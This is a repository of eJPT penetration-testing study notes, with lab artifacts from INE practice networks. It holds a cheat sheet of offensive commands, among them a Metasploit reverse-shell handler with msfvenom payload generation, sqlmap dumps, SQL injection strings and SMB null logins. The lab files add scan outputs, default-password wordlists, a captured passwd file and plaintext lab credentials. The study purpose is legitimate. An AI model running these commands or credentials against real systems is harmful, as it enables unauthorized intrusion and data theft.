[ { "path": "LICENSE", "content": "MIT License\n\nCopyright (c) 2022 Jason Turley\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n" }, { "path": "README.md", "content": "# eJPT\n\nMy notes and lab solutions from studying for the eLearnSecurity Junior Penetration Tester certificate.\n\n## Cheat Sheet\nCheck out the [cheatsheet](./cheat-sheet.md) for a list of useful commands\nand tips.\n" }, { "path": "cheat-sheet.md", "content": "# Cheat Sheet\n\nThis cheat sheet is a list of commands to help with the black box\npen test engagements. \n\n## Networking\n\nCheck routing table information\n\n```\n$ route\n$ ip route\n```\n\nAdd a network to current route\n\n```\n$ ip route add 192.168.10.0/24 via 10.175.3.1\n$ route add -net 192.168.10.0 netmask 255.255.255.0 gw 10.175.3.1\n```\n\nDNS\n\n```\n$ nslookup mysite.com\n$ dig mysite.com\n```\n\n## Subdomain Enumeration\n\n- [Sublist3r](https://github.com/aboul3la/Sublist3r)\n- [DNSdumpster](https://dnsdumpster.com/)\n\n## Footprinting & Scanning\n\nFind live hosts with fping or nmap\n```\n$ fping -a -g 172.16.100.40/24 2>/dev/null | tee alive_hosts.txt\n$ nmap -sn 172.16.100.40/24 -oN alive_hosts.txt\n```\n\nnmap scan types\n```\n-sS: TCP SYN Scan (aka Stealth Scan)\n-sT: TCP Connect Scan \n-sU: UDP Scan\n-sn: Port Scan\n-sV: Service Version information\n-O: Operating System information\n```\n\n### Spotting a Firewall\n\nIf an nmap TCP scan identified a well-known service, such as a web server, but\ncannot detect the version, then there may be a firewall in place.\n\nFor example:\n```\nPORT STATE SERVICE REASON VERSION\n80/tcp open http? syn-ack ttl 64\n```\n\nAnother example:\n```\n80/tcp open tcpwrapped \n```\n\n**\"tcpwrapped\"** means the TCP handshake was completed, but the remote host\nclosed the connection without receiving any data. \n\nThese are both indicators that a firewall is blocking our scan with the target!\n\nTips:\n- Use \"--reason\" to see why a port is marked open or closed\n- If a \"RST\" packet is received, then something prevented the connection - probably a firewall!\n\n## Masscan\nMasscan is designed to scan thousands of IP addresses at once.\n\n\n## Vulnerability Assessment\n\nUse the information from the Enumeration/Footprinting phases to find a vulnerable threat vector.\n\nBelow are some helpful Vulnerability assessment resources:\n- Searchsploit\n- ExploitDB\n- Msfconsole search command\n- Google\n- Nessus\n\n\n## Web Server Fingerprinting\n\nUse netcat for HTTP banner grabbing:\n```\n$ nc 80\nHEAD / HTTP/1.0\n```\n\nUse OpenSSL for HTTPS banner grabbing:\n```\n$ openssl s_client -connect target.site:443\nHEAD / HTTP/1.0\n```\n\nhttprint is a web fingerprinting tool that uses **signature-based** technique\nto identify web servers. This is more accurate since sysadmins can customize\nweb server banners.\n\n```\n$ httprint -P0 -h -s \n```\n\n## Directory and File Enumeration\n\nPick your favorite URI Enumeration tool\n- Gobuster - fast, multi-threaded scanner\n- Dirbuster - nice GUI\n- Dirb - recursively scans directories\n\n## XSS\n\nLook to exploit user input coming from:\n- Request headers\n- Cookies\n- Form inputs\n- POST parameters\n- GET parameters\n\nCheck for XSS\n```\n\nsome text\n```\n\nSteal cookies:\n```\n\n```\n\n## SQL Injection\n\nSame injection points as XSS. \n\nBoolean Injection:\n- and 1=1; -- -\n- or 'a'='a'; -- -\n\nOnce you determine that a site is vulnerable to SQLi, automate with SQL Map.\n\n```\n$ sqlmap -u \n$ sqlmap -u -p \n$ sqlmap -u --tables\n$ sqlmap -u -D -T --dump\n```\n\n## Windows Shares Enumeration\n\nCheck what shares are available on a host\n```\n$ smbclient -L //ip \n$ enum4linux -a ip_address\n```\n\n## SMB Null Attack\nTry to login without a username or password:\n\n```\n$ smbclient //ip/share -N\n```\n\n## MySQL Database commands\n\nLogin to MySQL with password\n```\n$ mysql --user=root --port=13306 -p -h 172.16.64.81\n```\n\n```\n> SHOW databases;\n> SHOW tables FROM databases;\n> USE database;\n> SELECT * FROM table;\n```\n\nChange table entry values\n```\n# Add the user tracking1 to the \"adm\" group\n> update users set adm=\"yes\" where username=\"tracking1\";\n```\n\n## Meterpreter reverse shell\n\n1. Find vulnerability in target (e.g. LFI/RFI)\n2. Set up a Metasploit listener\n```\nuse exploit/multi/handler\nset payload linux/x64/meterpreter_reverse_tcp # or any payload you wish\nset lhost \nset lport # set to a port open on the target to bypass firewall\nrun\n```\n\n3. Create a matching meterpreter-based executable using msfvenom\n```\nmsfvenon -p linux/x64/meterpreter_reverse_tcp lhost= lport= -f elf -o meter\n```\n\n4. Upload the payload to target (e.g LFI/RFI)\n\n## Adding Virtual Hosts\n\nIn the black box practice labs, we had to add a virtual host to /etc/hosts in\norder to connect to the webpage.\n\n```\n$ sudo vim /etc/hosts\n\tstatic.foobar.org\n```\n\n## Misc\n\n- Found a webshell/admin panel on a site?\n\t- Run phpinfo(); to determine if it is a PHP shell\n- Try to get a reverse shell connection\n- Check for flag in the user's home directory\n- Enumerate, enumerate, enumerate\n" }, { "path": "ine-labs/arp-poisoning/alive_hosts.txt", "content": "10.100.13.36\n10.100.13.37\n10.100.13.140\n" }, { "path": "ine-labs/arp-poisoning/nmap_scan.txt", "content": "# Nmap 7.91 scan initiated Sun Feb 21 18:21:32 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt\nNmap scan report for 10.100.13.36\nHost is up (0.085s latency).\nNot shown: 999 closed ports\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nNmap scan report for 10.100.13.37\nHost is up (0.071s latency).\nNot shown: 998 closed ports\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)\n23/tcp open telnet Linux telnetd\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nNmap scan report for 10.100.13.140\nHost is up (0.00020s latency).\nAll 1000 scanned ports on 10.100.13.140 are closed\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\n# Nmap done at Sun Feb 21 18:21:39 2021 -- 3 IP addresses (3 hosts up) scanned in 7.52 seconds\n" }, { "path": "ine-labs/black-box1/alive_hosts.txt", "content": "172.16.64.101\n172.16.64.140\n172.16.64.182\n172.16.64.199\n" }, { "path": "ine-labs/black-box1/dot101_DONE/README.md", "content": "# Apache Tomcat Webserver\n\n## Recon\nRunning gobuster shows hidden /manager directory that requires a username and password.\n\nOn the 401 Unauthorized error page, shows an example with username=tomcat and password=s3cret.\n\n## Initial Exploitation\n\nUse msfconsole to search for apache tomcat manager exploit\n\n```\nmeterpreter > getuid\ntomcat8\n\nmeterpreter > sysinfo\nComputer : xubuntu\nOS : Linux 4.4.0-104-generic (amd64)\nMeterpreter : java/linux\n```\n\nSearch for the flag:\n\n```\nmeterpreter > search -f flag.txt\nFound 2 results...\n /home/adminels/Desktop/flag.txt (12 bytes)\n /home/developer/flag.txt (29 bytes)\nmeterpreter > cat /home/adminels/Desktop/flag.txt\n You did it!\nmeterpreter > cat /home/developer/flag.txt\n Congratulations, you got it!\n\t\n```\n\nOther users in the home directory:\n```\nadminels\ndeveloper\nelsuser\n```\n" }, { "path": "ine-labs/black-box1/dot101_DONE/default-passwords.txt", "content": "admin\ntomcat\npassword\npassword1\nPassword1\nmanager\nroot\ntoor\nr00t\ns3cret\nrole1\nchangethis\n" }, { "path": "ine-labs/black-box1/dot101_DONE/default-users.txt", "content": "admin\nroot\ntomcat\nrole\nrole1\nmanager\n" }, { "path": "ine-labs/black-box1/dot101_DONE/passwd", "content": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false\nsystemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false\nsystemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false\nsystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false\nsyslog:x:104:108::/home/syslog:/bin/false\n_apt:x:105:65534::/nonexistent:/bin/false\nmessagebus:x:106:110::/var/run/dbus:/bin/false\nuuidd:x:107:111::/run/uuidd:/bin/false\nlightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false\nwhoopsie:x:109:116::/nonexistent:/bin/false\navahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false\navahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false\ncolord:x:112:123:colord colour management daemon,,,:/var/lib/colord:/bin/false\ndnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/bin/false\nhplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false\nkernoops:x:115:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false\npulse:x:116:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false\nrtkit:x:117:126:RealtimeKit,,,:/proc:/bin/false\nsaned:x:118:127::/var/lib/saned:/bin/false\nusbmux:x:119:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false\nspeech-dispatcher:x:120:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false\nelsuser:x:1000:1000:elsuser,,,:/home/elsuser:/bin/bash\nsshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin\ntomcat8:x:122:129::/usr/share/tomcat8:/bin/false\n" }, { "path": "ine-labs/black-box1/dot140_done/dirb_scan2.txt", "content": "\n-----------------\nDIRB v2.22 \nBy The Dark Raver\n-----------------\n\nOUTPUT_FILE: dirb_scan2.txt\nSTART_TIME: Wed Feb 24 14:11:27 2021\nURL_BASE: http://172.16.64.140/project/\nWORDLIST_FILES: /usr/share/dirb/wordlists/common.txt\nAUTHORIZATION: admin:admin\n\n-----------------\n\nGENERATED WORDS: 4612\n\n---- Scanning URL: http://172.16.64.140/project/ ----\n==> DIRECTORY: http://172.16.64.140/project/backup/\n==> DIRECTORY: http://172.16.64.140/project/css/\n==> DIRECTORY: http://172.16.64.140/project/images/\n+ http://172.16.64.140/project/includes (CODE:403|SIZE:304)\n+ http://172.16.64.140/project/index.html (CODE:200|SIZE:6525)\n\n---- Entering directory: http://172.16.64.140/project/backup/ ----\n==> DIRECTORY: http://172.16.64.140/project/backup/backup/\n==> DIRECTORY: http://172.16.64.140/project/backup/css/\n==> DIRECTORY: http://172.16.64.140/project/backup/images/\n+ http://172.16.64.140/project/backup/index.html (CODE:200|SIZE:6525)\n==> DIRECTORY: http://172.16.64.140/project/backup/test/\n\n---- Entering directory: http://172.16.64.140/project/css/ ----\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\n (Use mode '-w' if you want to scan it anyway)\n\n---- Entering directory: http://172.16.64.140/project/images/ ----\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\n (Use mode '-w' if you want to scan it anyway)\n\n---- Entering directory: http://172.16.64.140/project/backup/backup/ ----\n" }, { "path": "ine-labs/black-box1/dot140_done/sdadas.txt", "content": "Driver={SQL Server};Server=foosql.foo.com;Database=;Uid=fooadmin;Pwd=fooadmin;\n/var/www/html/project/354253425234234/flag.txt\n" }, { "path": "ine-labs/black-box1/dot140_done/test1.txt", "content": "https://stackoverflow.com/questions/1134319/difference-between-a-user-and-a-login-in-sql-server\n" }, { "path": "ine-labs/black-box1/dot199/enum4linux.txt", "content": "Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 24 12:24:59 2021\n\n ========================== \n| Target Information |\n ========================== \nTarget ........... 172.16.64.199\nRID Range ........ 500-550,1000-1050\nUsername ......... ''\nPassword ......... ''\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n\n\n ===================================================== \n| Enumerating Workgroup/Domain on 172.16.64.199 |\n ===================================================== \n[+] Got domain/workgroup name: WORKGROUP\n\n ============================================= \n| Nbtstat Information for 172.16.64.199 |\n ============================================= \nLooking up status of 172.16.64.199\n\tWIN10 <00> - B Workstation Service\n\tWORKGROUP <00> - B Domain/Workgroup Name\n\tWIN10 <20> - B File Server Service\n\n\tMAC Address = 00-50-56-A2-AD-96\n\n ====================================== \n| Session Check on 172.16.64.199 |\n ====================================== \n[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.\n" }, { "path": "ine-labs/black-box1/dot199/nmap_scan.txt", "content": "# Nmap 7.91 scan initiated Wed Feb 24 12:18:57 2021 as: nmap -sV --reason -oN nmap_scan.txt 172.16.64.199\nNmap scan report for 172.16.64.199\nHost is up, received conn-refused (0.070s latency).\nNot shown: 996 closed ports\nReason: 996 conn-refused\nPORT STATE SERVICE REASON VERSION\n135/tcp open msrpc syn-ack Microsoft Windows RPC\n139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn\n445/tcp open microsoft-ds? syn-ack\n1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2014 12.00.2000\nService Info: OS: Windows; CPE: cpe:/o:microsoft:windows\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\n# Nmap done at Wed Feb 24 12:19:30 2021 -- 1 IP address (1 host up) scanned in 33.26 seconds\n" }, { "path": "ine-labs/black-box1/id_rsa.pub", "content": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAlGWzjgKVHcpaDFvc6877t6ZT2ArQa+OiFteRLCc6TpxJ/lQFEDtmxjTcotik7V3DcYrIv3UsmNLjxKpEJpwqELGBfArKAbzjWXZE0VubmBQMHt4WmBMlDWGcKu8356blxom+KR5S5o+7CpcL5R7UzwdIaHYt/ChDwOJc5VK7QU46G+T9W8aYZtvbOzl2OzWj1U6NSXZ4Je/trAKoLHisVfq1hAnulUg0HMQrPCMddW5CmTzuEAwd8RqNRUizqsgIcJwAyQ8uPZn5CXKWbE/p1p3fzAjUXBbjB0c7SmXzondjmMPcamjjTTB7kcyIQ/3BQfBya1qhjXeimpmiNX1nnQ== rsa-key-20190313###ssh://developer:dF3334slKw@172.16.64.182:22#############################################################################################################################################################################################" }, { "path": "ine-labs/black-box1/initial_nmap_scan.txt", "content": "# Nmap 7.91 scan initiated Tue Feb 23 21:45:06 2021 as: nmap -sV -O -iL alive_hosts.txt -oN initial_nmap_scan.txt\nNmap scan report for 172.16.64.10\nHost is up (0.00021s latency).\nAll 1000 scanned ports on 172.16.64.10 are closed\nToo many fingerprints match this host to give specific OS details\nNetwork Distance: 0 hops\n\nNmap scan report for 172.16.64.101\nHost is up (0.061s latency).\nNot shown: 997 closed ports\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)\n8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1\n9080/tcp open http Apache Tomcat/Coyote JSP engine 1.1\nMAC Address: 00:50:56:A2:CE:79 (VMware)\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=2/23%OT=22%CT=1%CU=37260%PV=Y%DS=1%DC=D%G=Y%M=005056%T\nOS:M=6035BDE2%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=108%TI=Z%CI=I%II=I\nOS:%TS=8)SEQ(SP=103%GCD=1%ISR=106%TI=Z%CI=I%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7\nOS:ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1\nOS:=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O\nOS:=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N\nOS:)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=\nOS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF\nOS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=\nOS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)\n\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nNmap scan report for 172.16.64.140\nHost is up (0.062s latency).\nNot shown: 999 closed ports\nPORT STATE SERVICE VERSION\n80/tcp open http Apache httpd 2.4.18 ((Ubuntu))\nMAC Address: 00:50:56:A2:ED:B9 (VMware)\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=2/23%OT=80%CT=1%CU=42454%PV=Y%DS=1%DC=D%G=Y%M=005056%T\nOS:M=6035BDE2%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=10B%TI=Z%CI=I%II=I\nOS:%TS=8)SEQ(SP=108%GCD=1%ISR=10B%TI=Z%II=I%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7\nOS:ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1\nOS:=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O\nOS:=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N\nOS:)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=\nOS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF\nOS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=\nOS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)\n\nNetwork Distance: 1 hop\n\nNmap scan report for 172.16.64.182\nHost is up (0.068s latency).\nNot shown: 999 closed ports\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)\nMAC Address: 00:50:56:A2:10:16 (VMware)\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=2/23%OT=22%CT=1%CU=39565%PV=Y%DS=1%DC=D%G=Y%M=005056%T\nOS:M=6035BDE2%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10C%TI=Z%CI=I%II=I\nOS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O\nOS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6\nOS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O\nOS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=\nOS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%\nOS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(\nOS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=\nOS:N%T=40%CD=S)\n\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nNmap scan report for 172.16.64.199\nHost is up (0.065s latency).\nNot shown: 996 closed ports\nPORT STATE SERVICE VERSION\n135/tcp open msrpc Microsoft Windows RPC\n139/tcp open netbios-ssn Microsoft Windows netbios-ssn\n445/tcp open microsoft-ds?\n1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000\nMAC Address: 00:50:56:A2:AD:96 (VMware)\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=2/23%OT=135%CT=1%CU=43296%PV=Y%DS=1%DC=D%G=Y%M=005056%\nOS:TM=6035BDE2%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=104%TI=I%CI=I%II=\nOS:I%SS=S%TS=A)SEQ(SP=100%GCD=1%ISR=102%TI=I%CI=I%TS=A)OPS(O1=M4E7NW8ST11%O\nOS:2=M4E7NW8ST11%O3=M4E7NW8NNT11%O4=M4E7NW8ST11%O5=M4E7NW8ST11%O6=M4E7ST11)\nOS:WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=\nOS:2000%O=M4E7NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%\nOS:DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%\nOS:O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%\nOS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=\nOS:)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%\nOS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)\n\nNetwork Distance: 1 hop\nService Info: OS: Windows; CPE: cpe:/o:microsoft:windows\n\nOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .\n# Nmap done at Tue Feb 23 21:45:54 2021 -- 5 IP addresses (5 hosts up) scanned in 48.25 seconds\n" }, { "path": "ine-labs/black-box1/possible-usernames.txt", "content": "elsadmin\nadminels\nelsuser\ndeveloper\ntomcat\nmanager\nroot\nadmin\ndummy\nnao12023\n" }, { "path": "ine-labs/black-box1/thorough_nmap_scan.txt", "content": "# Nmap 7.91 scan initiated Wed Feb 24 13:41:35 2021 as: nmap -sV -n -T4 -Pn -p- -A -iL alive_hosts.txt -v --open -oN thorough_nmap_scan.txt\nNmap scan report for 172.16.64.101\nHost is up (0.074s latency).\nNot shown: 65531 closed ports\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 2048 7f:b7:1c:3d:55:b3:9d:98:58:11:17:ef:cc:af:27:67 (RSA)\n| 256 5f:b9:93:e2:ec:eb:f7:08:e4:bb:82:d0:df:b9:b1:56 (ECDSA)\n|_ 256 db:1f:11:ad:59:c1:3f:0c:49:3d:b0:66:10:fa:57:21 (ED25519)\n8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1\n| http-methods: \n| Supported Methods: GET HEAD POST PUT DELETE OPTIONS\n|_ Potentially risky methods: PUT DELETE\n|_http-server-header: Apache-Coyote/1.1\n|_http-title: Apache2 Ubuntu Default Page: It works\n9080/tcp open http Apache Tomcat/Coyote JSP engine 1.1\n| http-methods: \n| Supported Methods: GET HEAD POST PUT DELETE OPTIONS\n|_ Potentially risky methods: PUT DELETE\n|_http-server-header: Apache-Coyote/1.1\n|_http-title: Apache2 Ubuntu Default Page: It works\n59919/tcp open http Apache httpd 2.4.18 ((Ubuntu))\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache/2.4.18 (Ubuntu)\n|_http-title: Apache2 Ubuntu Default Page: It works\nMAC Address: 00:50:56:A2:CE:79 (VMware)\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=2/24%OT=22%CT=1%CU=30533%PV=Y%DS=1%DC=D%G=Y%M=005056%T\nOS:M=60369EA7%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=I%II=I\nOS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O\nOS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6\nOS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O\nOS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=\nOS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%\nOS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(\nOS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=\nOS:N%T=40%CD=S)\n\nUptime guess: 0.129 days (since Wed Feb 24 10:38:56 2021)\nNetwork Distance: 1 hop\nTCP Sequence Prediction: Difficulty=259 (Good luck!)\nIP ID Sequence Generation: All zeros\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT ADDRESS\n1 74.30 ms 172.16.64.101\n\nNmap scan report for 172.16.64.140\nHost is up (0.081s latency).\nNot shown: 65534 closed ports\nPORT STATE SERVICE VERSION\n80/tcp open http Apache httpd 2.4.18 ((Ubuntu))\n| http-methods: \n|_ Supported Methods: OPTIONS GET HEAD POST\n|_http-server-header: Apache/2.4.18 (Ubuntu)\n|_http-title: 404 HTML Template by Colorlib\nMAC Address: 00:50:56:A2:ED:B9 (VMware)\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP 